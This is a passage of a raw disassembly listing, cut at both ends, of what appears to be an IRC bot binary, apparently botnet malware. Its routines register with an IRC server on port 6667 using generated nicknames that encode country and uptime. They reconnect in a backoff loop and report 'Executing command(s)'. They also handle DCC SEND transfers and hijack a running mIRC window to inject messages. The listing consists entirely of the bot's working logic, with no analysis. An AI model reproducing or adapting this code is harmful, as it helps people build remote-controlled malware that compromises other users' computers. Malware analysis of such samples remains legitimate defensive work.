loc_40CEC9: ; CODE XREF: sub_40CEB0+15�j
push 327h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40CEDF
jmp short locret_40CF23
; ---------------------------------------------------------------------------
loc_40CEDF: ; CODE XREF: sub_40CEB0+2B�j
push 180h
push [ebp+var_8]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 184h
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+var_8]
push offset aExecutingComma ; "Executing command(s): %s"
push 0
push [ebp+var_4]
push offset sub_40C93C
call sub_4095A4
add esp, 14h
locret_40CF23: ; CODE XREF: sub_40CEB0+17�j
; sub_40CEB0+2D�j
leave
retn
sub_40CEB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF25 proc near ; CODE XREF: sub_4020C2+B3�p
; sub_40D871+59B�p ...
push ebp
mov ebp, esp
mov eax, ds:dword_41EA74
pop ebp
retn
sub_40CF25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF2F proc near ; CODE XREF: sub_40D366+D�p
; sub_40D366+8E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
jz short loc_40CF9E
push [ebp+arg_0]
push offset dword_41E968
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp [ebp+arg_4], 0
jz short loc_40CF60
push [ebp+arg_4]
push offset dword_41EA68
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40CF71
; ---------------------------------------------------------------------------
loc_40CF60: ; CODE XREF: sub_40CF2F+1E�j
push offset a6667 ; "6667"
push offset dword_41EA68
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40CF71: ; CODE XREF: sub_40CF2F+2F�j
cmp [ebp+arg_8], 0
jz short loc_40CF88
push [ebp+arg_8]
push offset byte_41E7E8
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40CF99
; ---------------------------------------------------------------------------
loc_40CF88: ; CODE XREF: sub_40CF2F+46�j
push offset byte_41DF00
push offset byte_41E7E8
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40CF99: ; CODE XREF: sub_40CF2F+57�j
jmp loc_40D020
; ---------------------------------------------------------------------------
loc_40CF9E: ; CODE XREF: sub_40CF2F+9�j
and [ebp+var_4], 0
jmp short loc_40CFAB
; ---------------------------------------------------------------------------
loc_40CFA4: ; CODE XREF: sub_40CF2F+8B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40CFAB: ; CODE XREF: sub_40CF2F+73�j
mov eax, [ebp+var_4]
imul eax, 0Ch
cmp ds:off_41DB18[eax], 0
jz short loc_40CFBC
jmp short loc_40CFA4
; ---------------------------------------------------------------------------
loc_40CFBC: ; CODE XREF: sub_40CF2F+89�j
call sub_410422
xor edx, edx
div [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
imul eax, 0Ch
push ds:off_41DB18[eax]
push offset dword_41E968
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_8]
imul eax, 0Ch
push ds:off_41DB1C[eax]
push offset dword_41EA68
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_8]
imul eax, 0Ch
cmp ds:dword_41DB20[eax], 0
jz short loc_40D020
mov eax, [ebp+var_8]
imul eax, 0Ch
push ds:dword_41DB20[eax]
push offset byte_41E7E8
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D020: ; CODE XREF: sub_40CF2F:loc_40CF99�j
; sub_40CF2F+D7�j
push offset dword_41E968
call sub_4105AD
pop ecx
push offset dword_41EA68
call sub_4105AD
pop ecx
push offset byte_41E7E8
call sub_4105AD
pop ecx
leave
retn
sub_40CF2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D043 proc near ; CODE XREF: sub_40D366+7F�p
; sub_40D871+619�p
var_250 = dword ptr -250h
var_24C = byte ptr -24Ch
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_18C = dword ptr -18Ch
var_188 = dword ptr -188h
var_184 = byte ptr -184h
var_104 = byte ptr -104h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 250h
push edi
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_80]
push eax
call sub_40668F
add esp, 0Ch
movsx eax, ds:byte_41E7E8
test eax, eax
jz short loc_40D099
push offset byte_41E7E8
call sub_4105FB
pop ecx
push offset byte_41E7E8
push offset aPassS ; "PASS %s"
call sub_40D6CB
pop ecx
pop ecx
push offset byte_41E7E8
call sub_4105AD
pop ecx
loc_40D099: ; CODE XREF: sub_40D043+2D�j
cmp [ebp+arg_0], 0
jz loc_40D132
movsx eax, ds:byte_41EF98
test eax, eax
jz short loc_40D0C3
push offset byte_41EF98
lea eax, [ebp+var_184]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40D0D6
; ---------------------------------------------------------------------------
loc_40D0C3: ; CODE XREF: sub_40D043+69�j
lea eax, [ebp+var_184]
push eax
push offset byte_41EF98
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D0D6: ; CODE XREF: sub_40D043+7E�j
movsx eax, ds:byte_41F118
test eax, eax
jz short loc_40D0F6
push offset byte_41F118
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40D109
; ---------------------------------------------------------------------------
loc_40D0F6: ; CODE XREF: sub_40D043+9C�j
lea eax, [ebp+var_104]
push eax
push offset byte_41F118
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D109: ; CODE XREF: sub_40D043+B1�j
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_184]
push eax
push offset aUserSSSS ; "USER %s %s %s :%s"
call sub_40D6CB
add esp, 14h
loc_40D132: ; CODE XREF: sub_40D043+5A�j
cmp [ebp+arg_4], 0
jz loc_40D363
cmp [ebp+arg_0], 0
jz short loc_40D163
movsx eax, ds:byte_41EF18
test eax, eax
jz short loc_40D163
push offset byte_41EF18
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40D363
; ---------------------------------------------------------------------------
loc_40D163: ; CODE XREF: sub_40D043+FD�j
; sub_40D043+108�j
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_188], eax
cmp [ebp+var_188], 4
jnb short loc_40D18D
call sub_406AE7
test eax, eax
jz loc_40D31F
loc_40D18D: ; CODE XREF: sub_40D043+13B�j
call sub_406A23
lea eax, [ebp+var_24C]
push eax
call sub_408342
pop ecx
test eax, eax
jnz short loc_40D1B6
push offset aUnk ; "UNK"
lea eax, [ebp+var_24C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D1B6: ; CODE XREF: sub_40D043+15E�j
call sub_408E8E
cmp eax, 400h
jbe short loc_40D1CF
call sub_408E8E
mov [ebp+var_250], eax
jmp short loc_40D1D9
; ---------------------------------------------------------------------------
loc_40D1CF: ; CODE XREF: sub_40D043+17D�j
mov [ebp+var_250], 400h
loc_40D1D9: ; CODE XREF: sub_40D043+18A�j
mov eax, [ebp+var_250]
shr eax, 0Ah
mov [ebp+var_228], eax
call sub_408887
mov [ebp+var_18C], eax
mov [ebp+var_224], offset aB ; "B"
cmp [ebp+var_18C], 2EEh
jnb short loc_40D213
mov [ebp+var_224], offset aA ; "A"
loc_40D213: ; CODE XREF: sub_40D043+1C4�j
cmp [ebp+var_18C], 1F4h
jnb short loc_40D229
mov [ebp+var_224], offset aG ; "G"
loc_40D229: ; CODE XREF: sub_40D043+1DA�j
and [ebp+var_22C], 0
mov [ebp+var_220], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_21C]
rep stosd
lea eax, [ebp+var_220]
push eax
call ds:dword_417030 ; GetVersionExA
cmp [ebp+var_21C], 5
jnz short loc_40D270
cmp [ebp+var_218], 1
jnz short loc_40D270
mov [ebp+var_22C], 1
loc_40D270: ; CODE XREF: sub_40D043+218�j
; sub_40D043+221�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
cmp [ebp+var_22C], 0
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push [ebp+var_224]
push [ebp+var_228]
push 5Dh
push [ebp+var_188]
push 5Bh
push 5Dh
lea eax, [ebp+var_24C]
push eax
push 5Bh
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
lea eax, [ebp+var_80]
push eax
call sub_416B5E ; sprintf
add esp, 34h
movsx eax, ds:byte_41DC08
test eax, eax
jz short loc_40D31D
push offset byte_41DC08
push offset dword_41DB88
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41DB88
call sub_4105FB
pop ecx
movsx eax, ds:byte_41DC88
test eax, eax
jz short loc_40D31D
push offset byte_41DC88
push offset dword_41EE18
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41EE18
call sub_4105FB
pop ecx
loc_40D31D: ; CODE XREF: sub_40D043+295�j
; sub_40D043+2BC�j
jmp short loc_40D343
; ---------------------------------------------------------------------------
loc_40D31F: ; CODE XREF: sub_40D043+144�j
push offset dword_41DB78
lea eax, [ebp+var_80]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_80]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_80]
push eax
call sub_40D7E5
pop ecx
loc_40D343: ; CODE XREF: sub_40D043:loc_40D31D�j
lea eax, [ebp+var_80]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
lea eax, [ebp+var_80]
push eax
push offset byte_41EF18
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D363: ; CODE XREF: sub_40D043+F3�j
; sub_40D043+11B�j
pop edi
leave
retn
sub_40D043 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D366 proc near ; CODE XREF: sub_40A9CF+1521�p
; sub_40D871+4A7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CF2F
add esp, 0Ch
push ds:dword_41EA74
call sub_40538D
pop ecx
mov [ebp+var_4], 0EA60h
loc_40D38E: ; CODE XREF: sub_40D366:loc_40D419�j
push offset dword_41E968
call sub_4105FB
pop ecx
push offset dword_41EA68
call sub_4105FB
pop ecx
push 2710h
push 1
push offset dword_41EA68
push offset dword_41E968
call sub_4050EA
add esp, 10h
mov ds:dword_41EA74, eax
push offset dword_41E968
call sub_4105AD
pop ecx
push offset dword_41EA68
call sub_4105AD
pop ecx
cmp ds:dword_41EA74, 0
jz short loc_40D3EE
push 1
push 1
call sub_40D043
pop ecx
pop ecx
jmp short locret_40D41E
; ---------------------------------------------------------------------------
loc_40D3EE: ; CODE XREF: sub_40D366+79�j
push 0
push 0
push 0
call sub_40CF2F
add esp, 0Ch
push [ebp+var_4]
call ds:dword_41709C ; Sleep
cmp [ebp+var_4], 0A4CB80h
jge short loc_40D419
mov eax, [ebp+var_4]
add eax, 0EA60h
mov [ebp+var_4], eax
loc_40D419: ; CODE XREF: sub_40D366+A6�j
jmp loc_40D38E
; ---------------------------------------------------------------------------
locret_40D41E: ; CODE XREF: sub_40D366+86�j
leave
retn
sub_40D366 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D420 proc near ; CODE XREF: sub_4020C2+1DE�p
; sub_40A9CF+1219�p ...
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
push [ebp+arg_0]
push offset aNoticeS ; "NOTICE %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_8]
push eax
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_1008]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1008]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push ds:dword_41EA74
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D420 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D4AB proc near ; CODE XREF: sub_4020C2+21B�p
; sub_40332B+1A6�p ...
var_1008 = dword ptr -1008h
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
push [ebp+arg_0]
push offset aPrivmsgS ; "PRIVMSG %s :"
lea eax, [ebp+var_1004]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_1008], eax
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_1008]
push eax
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+var_1004]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1004]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1004]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1004]
push eax
push ds:dword_41EA74
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D4AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D53F proc near ; CODE XREF: sub_401244+51�p
; sub_401244+41E�p ...
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+198h]
test eax, eax
jz short loc_40D55F
jmp locret_40D6C9
; ---------------------------------------------------------------------------
loc_40D55F: ; CODE XREF: sub_40D53F+19�j
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 1
jnz short loc_40D58F
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset aNoticeS ; "NOTICE %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D58F: ; CODE XREF: sub_40D53F+2E�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jnz short loc_40D5BB
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset dword_41A058
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5BB: ; CODE XREF: sub_40D53F+5A�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D5E7
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset dword_41A048
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5E7: ; CODE XREF: sub_40D53F+86�j
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset aPrivmsgS ; "PRIVMSG %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
loc_40D605: ; CODE XREF: sub_40D53F+4E�j
; sub_40D53F+7A�j ...
mov eax, [ebp+arg_0]
cmp dword ptr [eax+19Fh], 0
jz short loc_40D63C
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jz short loc_40D629
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D63C
loc_40D629: ; CODE XREF: sub_40D53F+DC�j
push offset dword_41A03C
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
loc_40D63C: ; CODE XREF: sub_40D53F+D0�j
; sub_40D53F+E8�j
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_8]
push eax
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_1008]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jz short loc_40D680
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D693
loc_40D680: ; CODE XREF: sub_40D53F+133�j
push offset dword_41A038
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
loc_40D693: ; CODE XREF: sub_40D53F+13F�j
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1008]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push ds:dword_41EA74
call sub_4053BF
add esp, 0Ch
locret_40D6C9: ; CODE XREF: sub_40D53F+1B�j
leave
retn
sub_40D53F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D6CB proc near ; CODE XREF: sub_40332B+205�p
; sub_40332B+212�p ...
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1004h
call sub_416BC0
lea eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_0]
push 1000h
lea eax, [ebp+var_1004]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1004]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1004]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1004]
push eax
push ds:dword_41EA74
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D6CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D734 proc near ; CODE XREF: sub_40D74D:loc_40D75E�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 0
push offset aMirc ; "mIRC"
call ds:dword_4171E8 ; FindWindowA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_40D734 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D74D proc near ; CODE XREF: sub_40A9CF+926�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jnz short loc_40D75E
jmp locret_40D7E3
; ---------------------------------------------------------------------------
loc_40D75E: ; CODE XREF: sub_40D74D+A�j
call sub_40D734
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40D76E
jmp short locret_40D7E3
; ---------------------------------------------------------------------------
loc_40D76E: ; CODE XREF: sub_40D74D+1D�j
push offset aMirc ; "mIRC"
push 1000h
push 0
push 4
push 0
push 0FFFFFFFFh
call ds:dword_4170C0 ; CreateFileMappingA
mov [ebp+var_8], eax
push 0
push 0
push 0
push 0F001Fh
push [ebp+var_8]
call ds:dword_4170BC ; MapViewOfFile
mov [ebp+var_C], eax
push [ebp+arg_0]
push [ebp+var_C]
call sub_416B5E ; sprintf
pop ecx
pop ecx
push 0
push 1
push 4C8h
push [ebp+var_4]
call ds:dword_4171EC ; SendMessageA
push 0
push 1
push 4C9h
push [ebp+var_4]
call ds:dword_4171EC ; SendMessageA
push [ebp+var_C]
call ds:dword_4170B8 ; UnmapViewOfFile
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
locret_40D7E3: ; CODE XREF: sub_40D74D+C�j
; sub_40D74D+1F�j
leave
retn
sub_40D74D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7E5 proc near ; CODE XREF: sub_40A9CF+E3�p
; sub_40D043+2FA�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_40D803
; ---------------------------------------------------------------------------
loc_40D7FC: ; CODE XREF: sub_40D7E5:loc_40D86D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40D803: ; CODE XREF: sub_40D7E5+15�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short locret_40D86F
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40D82E
push 39h
push 30h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_40D86D
; ---------------------------------------------------------------------------
loc_40D82E: ; CODE XREF: sub_40D7E5+32�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40D86D
call sub_410483
test eax, eax
jz short loc_40D85A
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_40D86D
; ---------------------------------------------------------------------------
loc_40D85A: ; CODE XREF: sub_40D7E5+5E�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
loc_40D86D: ; CODE XREF: sub_40D7E5+47�j
; sub_40D7E5+55�j ...
jmp short loc_40D7FC
; ---------------------------------------------------------------------------
locret_40D86F: ; CODE XREF: sub_40D7E5+24�j
leave
retn
sub_40D7E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D871 proc near ; CODE XREF: sub_40E618+321�p
var_7E8 = dword ptr -7E8h
var_7E4 = dword ptr -7E4h
var_7E0 = dword ptr -7E0h
var_7DC = byte ptr -7DCh
var_7D8 = dword ptr -7D8h
var_7D4 = dword ptr -7D4h
var_7D0 = dword ptr -7D0h
var_7CC = dword ptr -7CCh
var_7C8 = dword ptr -7C8h
var_7C4 = byte ptr -7C4h
var_7C0 = dword ptr -7C0h
var_7BC = byte ptr -7BCh
var_5BC = dword ptr -5BCh
var_5B8 = dword ptr -5B8h
var_5B4 = byte ptr -5B4h
var_4B4 = byte ptr -4B4h
var_490 = byte ptr -490h
var_390 = byte ptr -390h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_35C = dword ptr -35Ch
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_238 = dword ptr -238h
var_234 = byte ptr -234h
var_213 = byte ptr -213h
var_113 = dword ptr -113h
var_10F = byte ptr -10Fh
var_95 = dword ptr -95h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 7E8h
push edi
push offset aPing ; "PING"
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8A7
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
push offset aPongS ; "PONG %s"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8A7: ; CODE XREF: sub_40D871+1D�j
push offset aPong ; "PONG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8C2
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8C2: ; CODE XREF: sub_40D871+4A�j
push offset aMode ; "MODE"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8DD
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8DD: ; CODE XREF: sub_40D871+65�j
push offset aPrivmsg ; "PRIVMSG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DB2D
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jz loc_40DB2D
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax+1]
cmp eax, 1
jnz loc_40DB2D
push offset dword_41A14C
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DA81
mov eax, [ebp+arg_C]
cmp dword ptr [eax+10h], 0
jz loc_40DA81
push offset aSend ; "SEND"
mov eax, [ebp+arg_C]
push dword ptr [eax+10h]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DA81
cmp [ebp+arg_0], 0
jz loc_40DA81
mov eax, [ebp+arg_C]
cmp dword ptr [eax+14h], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+18h], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+1Ch], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+20h], 0
jnz short loc_40D98B
loc_40D986: ; CODE XREF: sub_40D871+F8�j
; sub_40D871+101�j ...
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D98B: ; CODE XREF: sub_40D871+113�j
mov eax, [ebp+arg_C]
mov eax, [eax+14h]
movsx eax, byte ptr [eax]
cmp eax, 22h
jnz short loc_40D99E
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D99E: ; CODE XREF: sub_40D871+126�j
mov eax, [ebp+arg_C]
push dword ptr [eax+20h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+20h]
and byte ptr [ecx+eax], 0
push [ebp+arg_4]
lea eax, [ebp+var_234]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41DB88
lea eax, [ebp+var_213]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
and [ebp+var_113], 0
push 7Ah
push 0
lea eax, [ebp+var_10F]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_95], 1
mov eax, [ebp+arg_C]
push dword ptr [eax+18h]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_238], eax
movzx eax, byte ptr [ebp+var_238]
push eax
mov eax, [ebp+var_238]
shr eax, 8
movzx eax, al
push eax
mov eax, [ebp+var_238]
shr eax, 10h
movzx eax, al
push eax
mov eax, [ebp+var_238]
shr eax, 18h
movzx eax, al
push eax
push offset dword_418A50
lea eax, [ebp+var_248]
push eax
call sub_416B5E ; sprintf
add esp, 18h
mov eax, [ebp+arg_C]
push dword ptr [eax+20h]
mov eax, [ebp+arg_C]
push dword ptr [eax+1Ch]
lea eax, [ebp+var_248]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax+14h]
push [ebp+arg_4]
lea eax, [ebp+var_234]
push eax
call sub_4024F3
add esp, 18h
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DA81: ; CODE XREF: sub_40D871+BA�j
; sub_40D871+C7�j ...
push offset dword_41A138
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz short loc_40DAAD
push offset dword_41A12C
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DAEB
loc_40DAAD: ; CODE XREF: sub_40D871+224�j
cmp [ebp+arg_0], 0
jz short loc_40DAD1
push offset dword_41DD08
push 3B7h
push 0
push offset dword_41A108
push [ebp+arg_4]
call sub_40D420
add esp, 14h
jmp short loc_40DAE6
; ---------------------------------------------------------------------------
loc_40DAD1: ; CODE XREF: sub_40D871+240�j
